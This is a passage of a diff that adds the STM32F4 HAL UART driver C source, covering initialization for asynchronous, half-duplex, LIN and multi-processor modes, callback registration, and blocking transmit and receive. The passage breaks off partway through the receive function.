UART_DMATxHalfCplt(DMA_HandleTypeDef *hdma); +static void UART_DMARxHalfCplt(DMA_HandleTypeDef *hdma); +static void UART_DMAError(DMA_HandleTypeDef *hdma); +static void UART_DMAAbortOnError(DMA_HandleTypeDef *hdma); +static void UART_DMATxAbortCallback(DMA_HandleTypeDef *hdma); +static void UART_DMARxAbortCallback(DMA_HandleTypeDef *hdma); +static void UART_DMATxOnlyAbortCallback(DMA_HandleTypeDef *hdma); +static void UART_DMARxOnlyAbortCallback(DMA_HandleTypeDef *hdma); +static HAL_StatusTypeDef UART_Transmit_IT(UART_HandleTypeDef *huart); +static HAL_StatusTypeDef UART_EndTransmit_IT(UART_HandleTypeDef *huart); +static HAL_StatusTypeDef UART_Receive_IT(UART_HandleTypeDef *huart); +static HAL_StatusTypeDef UART_WaitOnFlagUntilTimeout(UART_HandleTypeDef *huart, uint32_t Flag, FlagStatus Status, + uint32_t Tickstart, uint32_t Timeout); +static void UART_SetConfig(UART_HandleTypeDef *huart); + +/** + * @} + */ + +/* Exported functions ---------------------------------------------------------*/ +/** @defgroup UART_Exported_Functions UART Exported Functions + * @{ + */ + +/** @defgroup UART_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and Configuration functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to initialize the USARTx or the UARTy + in asynchronous mode. + (+) For the asynchronous mode only these parameters can be configured: + (++) Baud Rate + (++) Word Length + (++) Stop Bit + (++) Parity: If the parity is enabled, then the MSB bit of the data written + in the data register is transmitted but is changed by the parity bit. + Depending on the frame length defined by the M bit (8-bits or 9-bits), + please refer to Reference manual for possible UART frame formats. + (++) Hardware flow control + (++) Receiver/transmitter modes + (++) Over Sampling Method + [..] + The HAL_UART_Init(), HAL_HalfDuplex_Init(), HAL_LIN_Init() and HAL_MultiProcessor_Init() APIs + follow respectively the UART asynchronous, UART Half duplex, LIN and Multi-Processor configuration + procedures (details for the procedures are available in reference manual + (RM0430 for STM32F4X3xx MCUs and RM0402 for STM32F412xx MCUs + RM0383 for STM32F411xC/E MCUs and RM0401 for STM32F410xx MCUs + RM0090 for STM32F4X5xx/STM32F4X7xx/STM32F429xx/STM32F439xx MCUs + RM0390 for STM32F446xx MCUs and RM0386 for STM32F469xx/STM32F479xx MCUs)). + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the UART mode according to the specified parameters in + * the UART_InitTypeDef and create the associated handle. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_Init(UART_HandleTypeDef *huart) +{ + /* Check the UART handle allocation */ + if (huart == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + if (huart->Init.HwFlowCtl != UART_HWCONTROL_NONE) + { + /* The hardware flow control is available only for USART1, USART2, USART3 and USART6. + Except for STM32F446xx devices, that is available for USART1, USART2, USART3, USART6, UART4 and UART5. + */ + assert_param(IS_UART_HWFLOW_INSTANCE(huart->Instance)); + assert_param(IS_UART_HARDWARE_FLOW_CONTROL(huart->Init.HwFlowCtl)); + } + else + { + assert_param(IS_UART_INSTANCE(huart->Instance)); + } + assert_param(IS_UART_WORD_LENGTH(huart->Init.WordLength)); + assert_param(IS_UART_OVERSAMPLING(huart->Init.OverSampling)); + + if (huart->gState == HAL_UART_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + huart->Lock = HAL_UNLOCKED; + +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + UART_InitCallbacksToDefault(huart); + + if (huart->MspInitCallback == NULL) + { + huart->MspInitCallback = HAL_UART_MspInit; + } + + /* Init the low level hardware */ + huart->MspInitCallback(huart); +#else + /* Init the low level hardware : GPIO, CLOCK */ + HAL_UART_MspInit(huart); +#endif /* (USE_HAL_UART_REGISTER_CALLBACKS) */ + } + + huart->gState = HAL_UART_STATE_BUSY; + + /* Disable the peripheral */ + __HAL_UART_DISABLE(huart); + + /* Set the UART Communication parameters */ + UART_SetConfig(huart); + + /* In asynchronous mode, the following bits must be kept cleared: + - LINEN and CLKEN bits in the USART_CR2 register, + - SCEN, HDSEL and IREN bits in the USART_CR3 register.*/ + CLEAR_BIT(huart->Instance->CR2, (USART_CR2_LINEN | USART_CR2_CLKEN)); + CLEAR_BIT(huart->Instance->CR3, (USART_CR3_SCEN | USART_CR3_HDSEL | USART_CR3_IREN)); + + /* Enable the peripheral */ + __HAL_UART_ENABLE(huart); + + /* Initialize the UART state */ + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->gState = HAL_UART_STATE_READY; + huart->RxState = HAL_UART_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Initializes the half-duplex mode according to the specified + * parameters in the UART_InitTypeDef and create the associated handle. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HalfDuplex_Init(UART_HandleTypeDef *huart) +{ + /* Check the UART handle allocation */ + if (huart == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_UART_HALFDUPLEX_INSTANCE(huart->Instance)); + assert_param(IS_UART_WORD_LENGTH(huart->Init.WordLength)); + assert_param(IS_UART_OVERSAMPLING(huart->Init.OverSampling)); + + if (huart->gState == HAL_UART_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + huart->Lock = HAL_UNLOCKED; + +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + UART_InitCallbacksToDefault(huart); + + if (huart->MspInitCallback == NULL) + { + huart->MspInitCallback = HAL_UART_MspInit; + } + + /* Init the low level hardware */ + huart->MspInitCallback(huart); +#else + /* Init the low level hardware : GPIO, CLOCK */ + HAL_UART_MspInit(huart); +#endif /* (USE_HAL_UART_REGISTER_CALLBACKS) */ + } + + huart->gState = HAL_UART_STATE_BUSY; + + /* Disable the peripheral */ + __HAL_UART_DISABLE(huart); + + /* Set the UART Communication parameters */ + UART_SetConfig(huart); + + /* In half-duplex mode, the following bits must be kept cleared: + - LINEN and CLKEN bits in the USART_CR2 register, + - SCEN and IREN bits in the USART_CR3 register.*/ + CLEAR_BIT(huart->Instance->CR2, (USART_CR2_LINEN | USART_CR2_CLKEN)); + CLEAR_BIT(huart->Instance->CR3, (USART_CR3_IREN | USART_CR3_SCEN)); + + /* Enable the Half-Duplex mode by setting the HDSEL bit in the CR3 register */ + SET_BIT(huart->Instance->CR3, USART_CR3_HDSEL); + + /* Enable the peripheral */ + __HAL_UART_ENABLE(huart); + + /* Initialize the UART state*/ + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->gState = HAL_UART_STATE_READY; + huart->RxState = HAL_UART_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Initializes the LIN mode according to the specified + * parameters in the UART_InitTypeDef and create the associated handle. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @param BreakDetectLength Specifies the LIN break detection length. + * This parameter can be one of the following values: + * @arg UART_LINBREAKDETECTLENGTH_10B: 10-bit break detection + * @arg UART_LINBREAKDETECTLENGTH_11B: 11-bit break detection + * @retval HAL status + */ +HAL_StatusTypeDef HAL_LIN_Init(UART_HandleTypeDef *huart, uint32_t BreakDetectLength) +{ + /* Check the UART handle allocation */ + if (huart == NULL) + { + return HAL_ERROR; + } + + /* Check the LIN UART instance */ + assert_param(IS_UART_LIN_INSTANCE(huart->Instance)); + + /* Check the Break detection length parameter */ + assert_param(IS_UART_LIN_BREAK_DETECT_LENGTH(BreakDetectLength)); + assert_param(IS_UART_LIN_WORD_LENGTH(huart->Init.WordLength)); + assert_param(IS_UART_LIN_OVERSAMPLING(huart->Init.OverSampling)); + + if (huart->gState == HAL_UART_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + huart->Lock = HAL_UNLOCKED; + +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + UART_InitCallbacksToDefault(huart); + + if (huart->MspInitCallback == NULL) + { + huart->MspInitCallback = HAL_UART_MspInit; + } + + /* Init the low level hardware */ + huart->MspInitCallback(huart); +#else + /* Init the low level hardware : GPIO, CLOCK */ + HAL_UART_MspInit(huart); +#endif /* (USE_HAL_UART_REGISTER_CALLBACKS) */ + } + + huart->gState = HAL_UART_STATE_BUSY; + + /* Disable the peripheral */ + __HAL_UART_DISABLE(huart); + + /* Set the UART Communication parameters */ + UART_SetConfig(huart); + + /* In LIN mode, the following bits must be kept cleared: + - CLKEN bits in the USART_CR2 register, + - SCEN, HDSEL and IREN bits in the USART_CR3 register.*/ + CLEAR_BIT(huart->Instance->CR2, (USART_CR2_CLKEN)); + CLEAR_BIT(huart->Instance->CR3, (USART_CR3_HDSEL | USART_CR3_IREN | USART_CR3_SCEN)); + + /* Enable the LIN mode by setting the LINEN bit in the CR2 register */ + SET_BIT(huart->Instance->CR2, USART_CR2_LINEN); + + /* Set the USART LIN Break detection length. */ + CLEAR_BIT(huart->Instance->CR2, USART_CR2_LBDL); + SET_BIT(huart->Instance->CR2, BreakDetectLength); + + /* Enable the peripheral */ + __HAL_UART_ENABLE(huart); + + /* Initialize the UART state*/ + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->gState = HAL_UART_STATE_READY; + huart->RxState = HAL_UART_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Initializes the Multi-Processor mode according to the specified + * parameters in the UART_InitTypeDef and create the associated handle. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @param Address USART address + * @param WakeUpMethod specifies the USART wake-up method. + * This parameter can be one of the following values: + * @arg UART_WAKEUPMETHOD_IDLELINE: Wake-up by an idle line detection + * @arg UART_WAKEUPMETHOD_ADDRESSMARK: Wake-up by an address mark + * @retval HAL status + */ +HAL_StatusTypeDef HAL_MultiProcessor_Init(UART_HandleTypeDef *huart, uint8_t Address, uint32_t WakeUpMethod) +{ + /* Check the UART handle allocation */ + if (huart == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_UART_INSTANCE(huart->Instance)); + + /* Check the Address & wake up method parameters */ + assert_param(IS_UART_WAKEUPMETHOD(WakeUpMethod)); + assert_param(IS_UART_ADDRESS(Address)); + assert_param(IS_UART_WORD_LENGTH(huart->Init.WordLength)); + assert_param(IS_UART_OVERSAMPLING(huart->Init.OverSampling)); + + if (huart->gState == HAL_UART_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + huart->Lock = HAL_UNLOCKED; + +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + UART_InitCallbacksToDefault(huart); + + if (huart->MspInitCallback == NULL) + { + huart->MspInitCallback = HAL_UART_MspInit; + } + + /* Init the low level hardware */ + huart->MspInitCallback(huart); +#else + /* Init the low level hardware : GPIO, CLOCK */ + HAL_UART_MspInit(huart); +#endif /* (USE_HAL_UART_REGISTER_CALLBACKS) */ + } + + huart->gState = HAL_UART_STATE_BUSY; + + /* Disable the peripheral */ + __HAL_UART_DISABLE(huart); + + /* Set the UART Communication parameters */ + UART_SetConfig(huart); + + /* In Multi-Processor mode, the following bits must be kept cleared: + - LINEN and CLKEN bits in the USART_CR2 register, + - SCEN, HDSEL and IREN bits in the USART_CR3 register */ + CLEAR_BIT(huart->Instance->CR2, (USART_CR2_LINEN | USART_CR2_CLKEN)); + CLEAR_BIT(huart->Instance->CR3, (USART_CR3_SCEN | USART_CR3_HDSEL | USART_CR3_IREN)); + + /* Set the USART address node */ + CLEAR_BIT(huart->Instance->CR2, USART_CR2_ADD); + SET_BIT(huart->Instance->CR2, Address); + + /* Set the wake up method by setting the WAKE bit in the CR1 register */ + CLEAR_BIT(huart->Instance->CR1, USART_CR1_WAKE); + SET_BIT(huart->Instance->CR1, WakeUpMethod); + + /* Enable the peripheral */ + __HAL_UART_ENABLE(huart); + + /* Initialize the UART state */ + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->gState = HAL_UART_STATE_READY; + huart->RxState = HAL_UART_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the UART peripheral. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_DeInit(UART_HandleTypeDef *huart) +{ + /* Check the UART handle allocation */ + if (huart == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_UART_INSTANCE(huart->Instance)); + + huart->gState = HAL_UART_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_UART_DISABLE(huart); + +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) + if (huart->MspDeInitCallback == NULL) + { + huart->MspDeInitCallback = HAL_UART_MspDeInit; + } + /* DeInit the low level hardware */ + huart->MspDeInitCallback(huart); +#else + /* DeInit the low level hardware */ + HAL_UART_MspDeInit(huart); +#endif /* (USE_HAL_UART_REGISTER_CALLBACKS) */ + + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->gState = HAL_UART_STATE_RESET; + huart->RxState = HAL_UART_STATE_RESET; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + /* Process Unlock */ + __HAL_UNLOCK(huart); + + return HAL_OK; +} + +/** + * @brief UART MSP Init. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval None + */ +__weak void HAL_UART_MspInit(UART_HandleTypeDef *huart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(huart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_UART_MspInit could be implemented in the user file + */ +} + +/** + * @brief UART MSP DeInit. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @retval None + */ +__weak void HAL_UART_MspDeInit(UART_HandleTypeDef *huart) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(huart); + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_UART_MspDeInit could be implemented in the user file + */ +} + +#if (USE_HAL_UART_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User UART Callback + * To be used instead of the weak predefined callback + * @param huart uart handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_UART_TX_HALFCOMPLETE_CB_ID Tx Half Complete Callback ID + * @arg @ref HAL_UART_TX_COMPLETE_CB_ID Tx Complete Callback ID + * @arg @ref HAL_UART_RX_HALFCOMPLETE_CB_ID Rx Half Complete Callback ID + * @arg @ref HAL_UART_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_UART_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_UART_ABORT_COMPLETE_CB_ID Abort Complete Callback ID + * @arg @ref HAL_UART_ABORT_TRANSMIT_COMPLETE_CB_ID Abort Transmit Complete Callback ID + * @arg @ref HAL_UART_ABORT_RECEIVE_COMPLETE_CB_ID Abort Receive Complete Callback ID + * @arg @ref HAL_UART_MSPINIT_CB_ID MspInit Callback ID + * @arg @ref HAL_UART_MSPDEINIT_CB_ID MspDeInit Callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_RegisterCallback(UART_HandleTypeDef *huart, HAL_UART_CallbackIDTypeDef CallbackID, + pUART_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + huart->ErrorCode |= HAL_UART_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(huart); + + if (huart->gState == HAL_UART_STATE_READY) + { + switch (CallbackID) + { + case HAL_UART_TX_HALFCOMPLETE_CB_ID : + huart->TxHalfCpltCallback = pCallback; + break; + + case HAL_UART_TX_COMPLETE_CB_ID : + huart->TxCpltCallback = pCallback; + break; + + case HAL_UART_RX_HALFCOMPLETE_CB_ID : + huart->RxHalfCpltCallback = pCallback; + break; + + case HAL_UART_RX_COMPLETE_CB_ID : + huart->RxCpltCallback = pCallback; + break; + + case HAL_UART_ERROR_CB_ID : + huart->ErrorCallback = pCallback; + break; + + case HAL_UART_ABORT_COMPLETE_CB_ID : + huart->AbortCpltCallback = pCallback; + break; + + case HAL_UART_ABORT_TRANSMIT_COMPLETE_CB_ID : + huart->AbortTransmitCpltCallback = pCallback; + break; + + case HAL_UART_ABORT_RECEIVE_COMPLETE_CB_ID : + huart->AbortReceiveCpltCallback = pCallback; + break; + + case HAL_UART_MSPINIT_CB_ID : + huart->MspInitCallback = pCallback; + break; + + case HAL_UART_MSPDEINIT_CB_ID : + huart->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + huart->ErrorCode |= HAL_UART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (huart->gState == HAL_UART_STATE_RESET) + { + switch (CallbackID) + { + case HAL_UART_MSPINIT_CB_ID : + huart->MspInitCallback = pCallback; + break; + + case HAL_UART_MSPDEINIT_CB_ID : + huart->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + huart->ErrorCode |= HAL_UART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + huart->ErrorCode |= HAL_UART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(huart); + + return status; +} + +/** + * @brief Unregister an UART Callback + * UART callaback is redirected to the weak predefined callback + * @param huart uart handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_UART_TX_HALFCOMPLETE_CB_ID Tx Half Complete Callback ID + * @arg @ref HAL_UART_TX_COMPLETE_CB_ID Tx Complete Callback ID + * @arg @ref HAL_UART_RX_HALFCOMPLETE_CB_ID Rx Half Complete Callback ID + * @arg @ref HAL_UART_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_UART_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_UART_ABORT_COMPLETE_CB_ID Abort Complete Callback ID + * @arg @ref HAL_UART_ABORT_TRANSMIT_COMPLETE_CB_ID Abort Transmit Complete Callback ID + * @arg @ref HAL_UART_ABORT_RECEIVE_COMPLETE_CB_ID Abort Receive Complete Callback ID + * @arg @ref HAL_UART_MSPINIT_CB_ID MspInit Callback ID + * @arg @ref HAL_UART_MSPDEINIT_CB_ID MspDeInit Callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_UnRegisterCallback(UART_HandleTypeDef *huart, HAL_UART_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(huart); + + if (HAL_UART_STATE_READY == huart->gState) + { + switch (CallbackID) + { + case HAL_UART_TX_HALFCOMPLETE_CB_ID : + huart->TxHalfCpltCallback = HAL_UART_TxHalfCpltCallback; /* Legacy weak TxHalfCpltCallback */ + break; + + case HAL_UART_TX_COMPLETE_CB_ID : + huart->TxCpltCallback = HAL_UART_TxCpltCallback; /* Legacy weak TxCpltCallback */ + break; + + case HAL_UART_RX_HALFCOMPLETE_CB_ID : + huart->RxHalfCpltCallback = HAL_UART_RxHalfCpltCallback; /* Legacy weak RxHalfCpltCallback */ + break; + + case HAL_UART_RX_COMPLETE_CB_ID : + huart->RxCpltCallback = HAL_UART_RxCpltCallback; /* Legacy weak RxCpltCallback */ + break; + + case HAL_UART_ERROR_CB_ID : + huart->ErrorCallback = HAL_UART_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_UART_ABORT_COMPLETE_CB_ID : + huart->AbortCpltCallback = HAL_UART_AbortCpltCallback; /* Legacy weak AbortCpltCallback */ + break; + + case HAL_UART_ABORT_TRANSMIT_COMPLETE_CB_ID : + huart->AbortTransmitCpltCallback = HAL_UART_AbortTransmitCpltCallback; /* Legacy weak AbortTransmitCpltCallback */ + break; + + case HAL_UART_ABORT_RECEIVE_COMPLETE_CB_ID : + huart->AbortReceiveCpltCallback = HAL_UART_AbortReceiveCpltCallback; /* Legacy weak AbortReceiveCpltCallback */ + break; + + case HAL_UART_MSPINIT_CB_ID : + huart->MspInitCallback = HAL_UART_MspInit; /* Legacy weak MspInitCallback */ + break; + + case HAL_UART_MSPDEINIT_CB_ID : + huart->MspDeInitCallback = HAL_UART_MspDeInit; /* Legacy weak MspDeInitCallback */ + break; + + default : + /* Update the error code */ + huart->ErrorCode |= HAL_UART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_UART_STATE_RESET == huart->gState) + { + switch (CallbackID) + { + case HAL_UART_MSPINIT_CB_ID : + huart->MspInitCallback = HAL_UART_MspInit; + break; + + case HAL_UART_MSPDEINIT_CB_ID : + huart->MspDeInitCallback = HAL_UART_MspDeInit; + break; + + default : + /* Update the error code */ + huart->ErrorCode |= HAL_UART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + huart->ErrorCode |= HAL_UART_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(huart); + + return status; +} + +/** + * @brief Register a User UART Rx Event Callback + * To be used instead of the weak predefined callback + * @param huart Uart handle + * @param pCallback Pointer to the Rx Event Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_RegisterRxEventCallback(UART_HandleTypeDef *huart, pUART_RxEventCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + huart->ErrorCode |= HAL_UART_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(huart); + + if (huart->gState == HAL_UART_STATE_READY) + { + huart->RxEventCallback = pCallback; + } + else + { + huart->ErrorCode |= HAL_UART_ERROR_INVALID_CALLBACK; + + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(huart); + + return status; +} + +/** + * @brief UnRegister the UART Rx Event Callback + * UART Rx Event Callback is redirected to the weak HAL_UARTEx_RxEventCallback() predefined callback + * @param huart Uart handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_UnRegisterRxEventCallback(UART_HandleTypeDef *huart) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(huart); + + if (huart->gState == HAL_UART_STATE_READY) + { + huart->RxEventCallback = HAL_UARTEx_RxEventCallback; /* Legacy weak UART Rx Event Callback */ + } + else + { + huart->ErrorCode |= HAL_UART_ERROR_INVALID_CALLBACK; + + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(huart); + return status; +} +#endif /* USE_HAL_UART_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup UART_Exported_Functions_Group2 IO operation functions + * @brief UART Transmit and Receive functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + This subsection provides a set of functions allowing to manage the UART asynchronous + and Half duplex data transfers. + + (#) There are two modes of transfer: + (+) Blocking mode: The communication is performed in polling mode. + The HAL status of all data processing is returned by the same function + after finishing transfer. + (+) Non-Blocking mode: The communication is performed using Interrupts + or DMA, these API's return the HAL status. + The end of the data processing will be indicated through the + dedicated UART IRQ when using Interrupt mode or the DMA IRQ when + using DMA mode. + The HAL_UART_TxCpltCallback(), HAL_UART_RxCpltCallback() user callbacks + will be executed respectively at the end of the transmit or receive process + The HAL_UART_ErrorCallback()user callback will be executed when a communication error is detected. + + (#) Blocking mode API's are : + (+) HAL_UART_Transmit() + (+) HAL_UART_Receive() + + (#) Non-Blocking mode API's with Interrupt are : + (+) HAL_UART_Transmit_IT() + (+) HAL_UART_Receive_IT() + (+) HAL_UART_IRQHandler() + + (#) Non-Blocking mode API's with DMA are : + (+) HAL_UART_Transmit_DMA() + (+) HAL_UART_Receive_DMA() + (+) HAL_UART_DMAPause() + (+) HAL_UART_DMAResume() + (+) HAL_UART_DMAStop() + + (#) A set of Transfer Complete Callbacks are provided in Non_Blocking mode: + (+) HAL_UART_TxHalfCpltCallback() + (+) HAL_UART_TxCpltCallback() + (+) HAL_UART_RxHalfCpltCallback() + (+) HAL_UART_RxCpltCallback() + (+) HAL_UART_ErrorCallback() + + (#) Non-Blocking mode transfers could be aborted using Abort API's : + (+) HAL_UART_Abort() + (+) HAL_UART_AbortTransmit() + (+) HAL_UART_AbortReceive() + (+) HAL_UART_Abort_IT() + (+) HAL_UART_AbortTransmit_IT() + (+) HAL_UART_AbortReceive_IT() + + (#) For Abort services based on interrupts (HAL_UART_Abortxxx_IT), a set of Abort Complete Callbacks are provided: + (+) HAL_UART_AbortCpltCallback() + (+) HAL_UART_AbortTransmitCpltCallback() + (+) HAL_UART_AbortReceiveCpltCallback() + + (#) A Rx Event Reception Callback (Rx event notification) is available for Non_Blocking modes of enhanced reception services: + (+) HAL_UARTEx_RxEventCallback() + + (#) In Non-Blocking mode transfers, possible errors are split into 2 categories. + Errors are handled as follows : + (+) Error is considered as Recoverable and non blocking : Transfer could go till end, but error severity is + to be evaluated by user : this concerns Frame Error, Parity Error or Noise Error in Interrupt mode reception . + Received character is then retrieved and stored in Rx buffer, Error code is set to allow user to identify error type, + and HAL_UART_ErrorCallback() user callback is executed. Transfer is kept ongoing on UART side. + If user wants to abort it, Abort services should be called by user. + (+) Error is considered as Blocking : Transfer could not be completed properly and is aborted. + This concerns Overrun Error In Interrupt mode reception and all errors in DMA mode. + Error code is set to allow user to identify error type, and HAL_UART_ErrorCallback() user callback is executed. + + -@- In the Half duplex communication, it is forbidden to run the transmit + and receive process in parallel, the UART state HAL_UART_STATE_BUSY_TX_RX can't be useful. + +@endverbatim + * @{ + */ + +/** + * @brief Sends an amount of data in blocking mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the sent data is handled as a set of u16. In this case, Size must indicate the number + * of u16 provided through pData. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_Transmit(UART_HandleTypeDef *huart, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint8_t *pdata8bits; + uint16_t *pdata16bits; + uint32_t tickstart = 0U; + + /* Check that a Tx process is not already ongoing */ + if (huart->gState == HAL_UART_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(huart); + + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->gState = HAL_UART_STATE_BUSY_TX; + + /* Init tickstart for timeout management */ + tickstart = HAL_GetTick(); + + huart->TxXferSize = Size; + huart->TxXferCount = Size; + + /* In case of 9bits/No Parity transfer, pData needs to be handled as a uint16_t pointer */ + if ((huart->Init.WordLength == UART_WORDLENGTH_9B) && (huart->Init.Parity == UART_PARITY_NONE)) + { + pdata8bits = NULL; + pdata16bits = (uint16_t *) pData; + } + else + { + pdata8bits = pData; + pdata16bits = NULL; + } + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + while (huart->TxXferCount > 0U) + { + if (UART_WaitOnFlagUntilTimeout(huart, UART_FLAG_TXE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + if (pdata8bits == NULL) + { + huart->Instance->DR = (uint16_t)(*pdata16bits & 0x01FFU); + pdata16bits++; + } + else + { + huart->Instance->DR = (uint8_t)(*pdata8bits & 0xFFU); + pdata8bits++; + } + huart->TxXferCount--; + } + + if (UART_WaitOnFlagUntilTimeout(huart, UART_FLAG_TC, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + + /* At end of Tx process, restore huart->gState to Ready */ + huart->gState = HAL_UART_STATE_READY; + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receives an amount of data in blocking mode. + * @note When UART parity is not enabled (PCE = 0), and Word Length is configured to 9 bits (M1-M0 = 01), + * the received data is handled as a set of u16. In this case, Size must indicate the number + * of u16 available through pData. + * @param huart Pointer to a UART_HandleTypeDef structure that contains + * the configuration information for the specified UART module. + * @param pData Pointer to data buffer (u8 or u16 data elements). + * @param Size Amount of data elements (u8 or u16) to be received. + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_UART_Receive(UART_HandleTypeDef *huart, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + uint8_t *pdata8bits; + uint16_t *pdata16bits; + uint32_t tickstart = 0U; + + /* Check that a Rx process is not already ongoing */ + if (huart->RxState == HAL_UART_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(huart); + + huart->ErrorCode = HAL_UART_ERROR_NONE; + huart->RxState = HAL_UART_STATE_BUSY_RX; + huart->ReceptionType = HAL_UART_RECEPTION_STANDARD; + + /* Init tickstart for timeout management */ + tickstart = HAL_GetTick(); + + huart->RxXferSize = Size; + huart->RxXferCount = Size; + + /* In case of 9bits/No Parity transfer, pRxData needs to be handled as a uint16_t pointer */ + if ((huart->Init.WordLength == UART_WORDLENGTH_9B) && (huart->Init.Parity == UART_PARITY_NONE)) + { + pdata8bits = NULL; + pdata16bits = (uint16_t *) pData; + } + else + { + pdata8bits = pData; + pdata16bits = NULL; + } + + /* Process Unlocked */ + __HAL_UNLOCK(huart); + + /* Check the remain data to be received */ + while (huart->RxXferCount > 0U) + { + if (UART_WaitOnFlagUntilTimeout(huart, UART_FLAG_RXNE, RESET, tickstart, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + if (pdata8bits == NULL) + { + 